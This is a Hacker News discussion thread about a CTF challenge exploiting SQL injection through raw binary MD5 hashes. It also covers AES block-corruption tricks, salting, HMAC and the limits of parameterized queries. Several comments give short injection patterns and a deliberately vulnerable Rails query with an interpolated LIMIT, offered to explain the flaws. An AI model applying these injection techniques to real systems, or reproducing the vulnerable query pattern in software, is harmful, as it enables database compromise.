SQL injection with raw MD5 hashes

tptacek · on Nov 28, 2010

Summary: binary MD5 hashes are, in fact, binary, and any given MD5 hash has a 1/16 chance of containing a given SQL metacharacter. The CTF challenge here required the calculation of a hash containing a whole 4-character injection string; this is harder, but not Hard.

You should know that the exact same problem applies (moreso, in fact) to encrypted strings. Developer laziness insulates most apps from raw MD5 digests (most devs use the hex digest function, which returns human readable [and safe] output). But the exact same "iterate 1 bit at a time until you hit a jackpot block" trick works with almost every application that uses AES.

It's not just SQL, either; I've used it to get XSS out of corrupted AES decryptions as well.

And, of course, the same trick works in the opposite direction. If you encrypt a string with a quoting domain (say, where the character ';' needs to be quoted '\;' to preserve an encoded tuple), attackers can pad inputs to get the quote and the metacharacter to span blocks, then use block corruption to kill the quote but not the metacharacter.

Have I mentioned today how you shouldn't be building crypto code? DON'T DATE ROBOTS.

akirk · on Nov 29, 2010

It just feels like it's getting hammered into programmers' minds to never use unescaped strings in DB queries all the time. Quite hard to believe that a decent programmer would concat such raw output to an SQL string unescaped. Nevertheless I'm sure this happens all the time.

The interesting thing about this report is how fast you can brute-force calculate this in order to find a magic byte sequence.

DougBTX · on Nov 28, 2010

The winner managed it with a 3-char injection: http://blog.nibbles.fr/2039

daeken · on Nov 28, 2010

> It's not just SQL, either; I've used it to get XSS out of corrupted AES decryptions as well.

How would you go about such a thing? My initial thought is to simply permute over the controllable bytes and see what comes out, looking for specific characters that get you what you need, e.g. a quote to break out of an HTML attribute, but I think I might be missing an easier path.

tptacek · on Nov 28, 2010

Nope, that's how you do it. In the case I'm thinking of, I only needed one character (but it needed to be the last byte).

pontifier · on Nov 29, 2010

I wish there was an easy answer to encryption and security, but it seems like an arms race a la "The Cassini Division". No matter how you build a system there are always more inputs to compromise... and the attackers never give up.

axod · on Nov 29, 2010

The easy way is to not use a stupid function like md5(?, true) which returns binary data, and include it without escaping in your SQL.

It's really not rocket science.

mike-cardwell · on Nov 29, 2010

Exactly. It's so damn easy to not make these mistakes. I don't know how people manage it.

pontifier · on Nov 30, 2010

Is it easy to enumerate all the potential attack points in a system?

aonic · on Nov 28, 2010

In all my years of dealing with ugly and insecure PHP code, never have I seen anyone using raw md5's in PHP

Sounds like a fabricated situation just for the game to me, versus something trying to resemble real life situations. Not saying its not possible, but the type of coders that would make a SQL injection oversight with something like that would also not care to provide a non-default raw_output value to the function for the heck of it

bl4k · on Nov 28, 2010

I am more impressed by whoever came up with the challenge, although setting the second parameter of md5 to 'true' made it obvious what the solution to the puzzle was (nobody would ever have binary output on irl).

The French team came up with the solution quicker as they worked out that any '=' would work - their keyspace search was thus an order of magnitude quicker:

http://blog.nibbles.fr/2039

sgronblo · on Nov 29, 2010

I thought it required '='[^1-9] ? Because real 'password' = 'bogus crap' would turn into 0 which would then be compared to a string starting with something else than 1-9 which gets turned into a 0 as well.

photon_off · on Nov 29, 2010

This might be only tangentially related, and I'm sure nearly everyone on HN knows this, but salting MD5's is probably the easiest way to significantly increase their security. By changing md5($var) to md5($var . "foo") this type of attack could be prevented, assuming that the crackers don't have access to the source code [in this challenge, they did].

To get an idea of what can be exposed if you don't salt, and thus use predictable hashes, have a look here: http://www.google.com/#q=inurl:c4ca4238a0b923820dcc509a6f758...

md5(1) = c4ca4238...

timtadh · on Nov 29, 2010

+1 to prodigal_erik

Also concatenating "foo" to the end of /every/ password is not salting your hash. You need to have a suitably random string for it be considered salt. Also you want to have a different random string for every password in your database.

[+1 to tptacek for constantly saying don't write crypto code :-p]

photon_off · on Nov 29, 2010

I should have noted that "foo" wasn't meant to be taken literally; clearly it should be something that wouldn't show up in a dictionary. Even so, the point was that any salt is substantially better than none, and is easy to implement.

prodigal_erik · on Nov 29, 2010

There are theoretical attacks against simply adding secret bits to a single hash. You're probably better off with HMAC, which is essentially md5($key . md5($key . $message)) with a few padding details.

http://en.wikipedia.org/wiki/HMAC

JoachimSchipper · on Nov 29, 2010

"Salting" is not the solution to every problem. More to the point, if you put binary data in an SQL query things are going to break, even if you use tricks like this to make it a bit less predictable. (Really, the probability of random binary data containing a ' character is pretty high...)

philfreo · on Nov 28, 2010

And it looks like an even faster solution, here, but in French. http://blog.nibbles.fr/2039

gus_massa · on Nov 29, 2010

Automatic Google Translation: http://translate.google.com/translate?js=n&prev=_t&h...

sh1mmer · on Nov 29, 2010

PHP contains filters for a reason. They are there to protect you.

While this was a clever challenge, in general you should sanitize all of your input using filters.

pornel · on Nov 29, 2010

Filtering of input is not appropriate way of ensuring that SQL queries are safe, e.g. you'd be telling people named "O'Hara" that they're not SQL-compatible or you'll fall into magic_quotes trap.

You should escape output.

In this case there isn't anything wrong with the input, and you can't say that any byte of MD5 is wrong or dangerous.

It's just data that is used improperly.

Binary data in SQL queries is especially tricky, because strings may be expected to be in specific character encoding (e.g. UTF-8), so you either need to use prepared statements and pass argument explicitly as binary, or use string-safe escaping (e.g. hex).

getsat · on Nov 29, 2010

In general, you should not use PHP, but, If you must, you should be using a framework that handles this kind of stuff for you.

Input sanitisation has been solved thousands of times by people smarter than you. Do not reinvent the wheel (poorly).

konad · on Nov 30, 2010

magic_quotes is turned off by default for a reason too.

hackermom · on Nov 28, 2010

This is all quite clever, but any wary developer makes sure to use either properly sanitized inputs, or better still, prepared SQL statements (as f.e. available through PHP's PDO method), so this trickery, no matter how clever, is really not a big issue.

tptacek · on Nov 28, 2010

"Any wary developer" ranks up there with "a sufficiently clever compiler" among the True Scotsmen of our industry. I don't think you're right; empirically, unsafe SQL is a very big issue, and the places where a QA team is unlikely to stumble across injection vectors (ie, any vector where the string "O'Malley" doesn't pop up an error to paste into a ticket) are worse still, since teams don't find them.

frederique · on Nov 28, 2010

i think you don't look outside your own "boxeola" too much. no all development is done by a) clueless team that passes the software on to b) quality assurance + bughunters. relying on or assuming that someone else will take care of eventual loose ends is a very bad and ignorant approach to creating software, and in my soon 15 years of experience as a european programmer this is thankfully no where near the majority of cases.

daeken · on Nov 28, 2010

I think one key difference is in when the software was developed. If I had to guess, most software developed in the past 5 years (being conservative here) is most likely not vulnerable to SQL injection, simply because doing things the right way (that is, using parameterized queries and the like) is so easy these days. But if you look at software developed prior -- and software built at a lower level, e.g. directly hitting the PHP mysql API -- you've got a fair shot at stumbling upon SQL injection, I'd say. That means that most developers writing say, Django or Rails apps, are never going to have to think about SQL injection, and won't see how prevalent it is. In theory, SQL injection is a solved problem -- we've known how to avoid it for a long, long time -- but in practice, it's still out there in full force, largely due to legacy code.

tptacek · on Nov 28, 2010

Parameterized queries are also simply not the panacea they're made out to be; there remain plenty of opportunities for injection even with a parameterized query. SQL injection via MD5 digests are indeed unlikely, but not because of query structure --- rather, because most developers don't know to take the binary result instead of the more convenient hex result.

It just rubs me the wrong way when people claim "if you do things right, you'll never run into this problem anyways". Two possible interpretations: either "do things right" is too broad to mean anything (no-true-Scotsman-style) or "do things right" involves a piece of advice like "used parameterized queries" which doesn't actually work reliably in the real world.

We have absolutely found SQL injection in Rails code before. I've also had engagements on very modern financial codebases where the developers were able to expound at length on how impossible it would be for them to have injection --- providing entirely sane design rules to back it up --- that ended up losing their entire app to pre-auth SQLI. There's always some tiny corner of the app --- a custom query builder, a hand-hacked pagination system, a sort column generator, a table selector parameter, that one stored procedure that does dynamic SQL and doesn't know what U+2032 is --- that manages to slip up.

jtdowney · on Nov 29, 2010

> Parameterized queries are also simply not the panacea they're made out to be; there remain plenty of opportunities for injection even with a parameterized query.

Can you describe a case or point to example code using a parameterized query that is vulnerable to SQL injection? I've seen a stored procedure that built raw queries and pass them to sp_executesql (T-SQL) that provided a vector for SQL injection. However I am struggling to think of a case where a parameterized query could allow for SQL injection.

tptacek · on Nov 29, 2010

Not every input to a query can be bound as a parameter.

Simplest example: User.find_by_sql("SELECT * from users where name = ? LIMIT #{ limit }", name)

Other examples: sort order (ASC/DESC), table selection, join columns, GROUP BY argument.

If you think I'm arguing against parameterized queries: of course not. Use them. But know their limitations.

jerf · on Nov 29, 2010

For those who didn't know what tptacek meant by U+2032, like me, a quick Google search picked up this: http://news.ycombinator.net/item?id=1940713 , in which he explained it three days ago: "This is a classic web security problem; most famously, WinAPI systems have a 'flattening' function that would convert things like PRIME U+2032 into ASCII 0x27 (the tick that terminates SQL statements)."

Someone · on Nov 29, 2010

I am not so sure of that. There is lots of code that is not so much developed as it is evolved from a Q&D n-liner (n<20). Such code can easily have some left-over opportunities for SQL injection attacks.

tptacek · on Nov 28, 2010

We're basically paid to look in other people's boxeolae.

Sorry, if your own personal experience suggests that most software is rigorous with SQL and input validation, I think I have to assert a broader and more accurate perspective on the issue. It feels statistically improbable to me that we're just missing all the "good" software.

on Nov 28, 2010

[deleted]

on Nov 28, 2010

[deleted]

daeken · on Nov 28, 2010

Sorry, I actually intended to reply to the parent of your comment -- reposted and deleted my response just after you commented.

Parameterized queries aren't a panacea, but they seem to mitigate most of the issues. That said, a lot of people rely solely on them, thinking they really are. While certain things make the vast majority of attacks infeasible (e.g. using SQLAlchemy rather than any straight SQL), nothing can replace actually knowing about the security issues and designing solutions that are immune to them.

frederique · on Nov 29, 2010

this could be a case of demographical difference. programming culture and methods of approach is vastly different in europe, the americas, and asia as indeed often told by migrating workers in our field. consequently we can assert that it is equally likely that it is just you who have a narrow and selfserving perspective of your business, and that there is more diversity out there than what you specifically deal with for your living :-)

konad · on Nov 30, 2010

I know there was already a shorter solution but

instead of '||'[1-9]

one could have searched for

'!=' or '<>' thus opening up the search space